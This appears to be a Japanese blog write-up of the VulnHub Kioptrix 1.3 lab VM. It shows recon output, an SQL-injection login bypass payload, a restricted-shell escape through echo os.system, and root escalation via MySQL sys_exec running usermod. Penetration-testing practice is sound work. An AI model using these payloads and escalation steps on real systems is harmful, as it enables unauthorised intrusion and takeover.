vulnhub Kioptrix1.3 雑記
kioptrix 1.3
pentest
arp-scan -I eth0 -l
でipスキャン
サービス調査
# nmap -p- 10.10.10.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 11:14 EDT Nmap scan report for 10.10.10.6 Host is up (0.00047s latency). Not shown: 39528 closed ports, 26003 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 08:00:27:4F:0D:1D (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 38.42 seconds root@kali:~/EXattack/Vulunhub/kioptrix1-3# nmap -P0 -p22,80,139,445 -sV -version-all 10.10.10.6 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-28 11:14 EDT Nmap scan report for 10.10.10.6 Host is up (0.00088s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) MAC Address: 08:00:27:4F:0D:1D (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.17 seconds
気になりどころ
- OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
- Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
- Samba smbd 3.X - 4.X (workgroup: WORKGROUP) ×2
詳細
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
月並み?
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
# nikto -h 10.10.10.6 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.6 + Target Hostname: 10.10.10.6 + Target Port: 80 + Start Time: 2020-04-29 03:56:20 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch + Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch. + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /images/: Directory indexing found. + Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 06:48:10 2007 + OSVDB-3233: /icons/README: Apache default file found. + Cookie PHPSESSID created without the httponly flag + 8672 requests: 0 error(s) and 19 item(s) reported on remote host + End Time: 2020-04-29 03:56:51 (GMT-4) (31 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.6 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Apr 29 03:58:08 2020 URL_BASE: http://10.10.10.6/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.6/ ---- + http://10.10.10.6/cgi-bin/ (CODE:403|SIZE:325) ==> DIRECTORY: http://10.10.10.6/images/ + http://10.10.10.6/index (CODE:200|SIZE:1255) + http://10.10.10.6/index.php (CODE:200|SIZE:1255) ==> DIRECTORY: http://10.10.10.6/john/ + http://10.10.10.6/logout (CODE:302|SIZE:0) + http://10.10.10.6/member (CODE:302|SIZE:220) + http://10.10.10.6/server-status (CODE:403|SIZE:330) ---- Entering directory: http://10.10.10.6/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.6/john/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Wed Apr 29 03:58:10 2020 DOWNLOADED: 4612 - FOUND: 6
とりあえず、「http://10.10.10.6」へ接続するとログインフォームが現れる。
UsernameとPasswordに「'」シングルクォーテーションを入力したりしてみると、Passwordに「'」が入った時にエラーを吐く。
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28
Usernameは適当に入れといて、PasswordにSQLiしたらログインできるかもしれない。
「'or 1=1 or ''='」等,Passwordに入力すると
User admin Oups, something went wrong with your member's page account. Please contact your local Administrator to fix the issue.
と出るが、ログインはできていない。
そういえば、「dirb」の探索で「john」ってあったな。
Username「john」,Password「'or 1=1 or ''='」を入力してみた。
Member's Control Panel Username : john Password : MyNameIsJohn
ログイン成功した模様。
とりあえず、他のファイルも見てみる。
/images/に目ぼしいものはない。
/john/には、「john.php」という謎phpがある。
アクセスすると、ログインフォームが同じく表示され、「index.php」と同様にログインを確認した。
johnでssh接続可能か試す。
# ssh john@10.10.10.6 john@10.10.10.6's password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ help cd clear echo exit help ll lpath ls john:~$ cd ../ *** forbidden path -> "/home/" *** You have 0 warning(s) left, before getting kicked out. This incident has been reported. john:~$ ls ../ *** forbidden path -> "/home/" *** Kicked out Connection to 10.10.10.6 closed.
johnは使用可能なコマンドが制限されていて、さらに違反するとコネクションが切断されるようだ。
echoで違うshell呼び出せばいいじゃん。
参考
SANS Cyber Security Certifications & Research
Spawning a TTY Shell
ということで、rlwrapもつけてやる。
# rlwrap ssh john@10.10.10.6 john@10.10.10.6's password: Welcome to LigGoat Security Systems - We are Watching == Welcome LigGoat Employee == LigGoat Shell is in place so you don't screw up Type '?' or 'help' to get the list of allowed commands john:~$ ? cd clear echo exit help ll lpath ls john:~$ echo os.system('/bin/bash') john@Kioptrix4:~$ uname -a Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
では、shell取れたのでrootへの道を探す。
とりあえず、webサイトの先ほど見れてないファイルでも見に行くか。
john@Kioptrix4:~$ cd /var/www/ john@Kioptrix4:/var/www$ ls checklogin.php database.sql images index.php john login_success.php logout.php member.php robert
いっぱいの順に見ていく。
john@Kioptrix4:/var/www$ cat checklogin.php <?php ob_start(); $host="localhost"; // Host name $username="root"; // Mysql username $password=""; // Mysql password $db_name="members"; // Database name $tbl_name="members"; // Table name // Connect to server and select databse. mysql_connect("$host", "$username", "$password")or die("cannot connect"); mysql_select_db("$db_name")or die("cannot select DB"); // Define $myusername and $mypassword $myusername=$_POST['myusername']; $mypassword=$_POST['mypassword']; // To protect MySQL injection (more detail about MySQL injection) $myusername = stripslashes($myusername); //$mypassword = stripslashes($mypassword); $myusername = mysql_real_escape_string($myusername); //$mypassword = mysql_real_escape_string($mypassword); //$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'"; $result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'"); //$result=mysql_query($sql); // Mysql_num_row is counting table row $count=mysql_num_rows($result); // If result matched $myusername and $mypassword, table row must be 1 row if($count!=0){ // Register $myusername, $mypassword and redirect to file "login_success.php" session_register("myusername"); session_register("mypassword"); header("location:login_success.php?username=$myusername"); } else { echo "Wrong Username or Password"; print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>'); } ob_end_flush(); ?>
早速良さそうなの引いた?
始めの部分にmysqlのログイン情報書いてある。
これはつまり、mysqlがroot権限で動いているということでは
次の記事で( ゚д゚)ハッ!っとなった。
Command execution with a MySQL UDF | Bernardo Dag
MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux
SQLにUDFなんてものがあったのか。
まず、
john@Kioptrix4:/var/www$ whereis lib_mysqludf_sys lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
あるということは....
つまり......
john@Kioptrix4:/var/www$ mysql -u root Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 71 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> select sys_exec('id > /tmp/id.txt'); +------------------------------+ | sys_exec('id > /tmp/id.txt') | +------------------------------+ | NULL | +------------------------------+ 1 row in set (0.01 sec) mysql> select sys_exec('chmod 777 /tmp/id.txt'); +-----------------------------------+ | sys_exec('chmod 777 /tmp/id.txt') | +-----------------------------------+ | NULL | +-----------------------------------+ 1 row in set (0.01 sec) mysql> exit Bye john@Kioptrix4:/var/www$ cat /tmp/id.txt uid=0(root) gid=0(root)
!!!!!!
john@Kioptrix4:~$ cat /etc/group john@Kioptrix4:~$ cat /etc/group root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:loneferret tty:x:5: disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20:loneferret fax:x:21: voice:x:22: cdrom:x:24:loneferret floppy:x:25:loneferret tape:x:26: sudo:x:27: audio:x:29:loneferret dip:x:30:loneferret www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44:loneferret sasl:x:45: plugdev:x:46:loneferret staff:x:50: games:x:60: users:x:100: nogroup:x:65534: libuuid:x:101: dhcp:x:102: syslog:x:103: klog:x:104: scanner:x:105: nvram:x:106: fuse:x:107:loneferret mysql:x:108: crontab:x:109: mlocate:x:110: ssh:x:111: sambashare:x:112:loneferret winbindd_priv:x:113: loneferret:x:1000: lpadmin:x:114:loneferret admin:x:115:loneferret,john john:x:1001: robert:x:1002: john@Kioptrix4:~$ mysql -u root Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 8 Server version: 5.0.51a-3ubuntu5.4 (Ubuntu) Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> select sys_exec("usermod -aG admin john"); +------------------------------------+ | sys_exec("usermod -aG admin john") | +------------------------------------+ | NULL | +------------------------------------+ 1 row in set (0.05 sec) mysql> exit Bye john@Kioptrix4:~$ sudo su [sudo] password for john: root@Kioptrix4:/home/john# id uid=0(root) gid=0(root) groups=0(root) root@Kioptrix4:~# cd /root/ root@Kioptrix4:~# ls congrats.txt lshell-0.9.12 root@Kioptrix4:~# cat congrats.txt Congratulations! You've got root. There is more then one way to get root on this system. Try and find them. I've only tested two (2) methods, but it doesn't mean there aren't more. As always there's an easy way, and a not so easy way to pop this box. Look for other methods to get root privileges other than running an exploit. It took a while to make this. For one it's not as easy as it may look, and also work and family life are my priorities. Hobbies are low on my list. Really hope you enjoyed this one. If you haven't already, check out the other VMs available on: www.kioptrix.com Thanks for playing, loneferret
rootのパスワード消してsshログインしてみようと思ったけど、公開鍵がなんたらと言われてしまった。
adminグループにjohnを追加してrootになるのが一番楽?
「/etc/sudoers」に「john ALL=(ALL) ALL」追加でも良い?
root権限で作業して権限変える系なら色々手段ありそう。
Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Sambaの精確なバージョンチェックをする。
自分の環境だとなぜか「smbclient」も「enum4linux」が使えないので、metasploit使うしかないと思っている。
msf5 > use auxiliary/scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads (max one per host) msf5 auxiliary(scanner/smb/smb_version) > set rhosts 10.10.10.6 rhosts => 10.10.10.6 msf5 auxiliary(scanner/smb/smb_version) > run [*] 10.10.10.6:445 - Host could not be identified: Unix (Samba 3.0.28a) [*] 10.10.10.6:445 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf5 auxiliary(scanner/smb/smb_version) > exit
うむ、分からん。
終わり
「chmod u+s /bin/(ba)sh」した場合のroot以外から、/bin/(ba)sh起動した場合はroot奪取と言えるか問題。
smbclientもenum4linuxも上手く動いてくれない問題。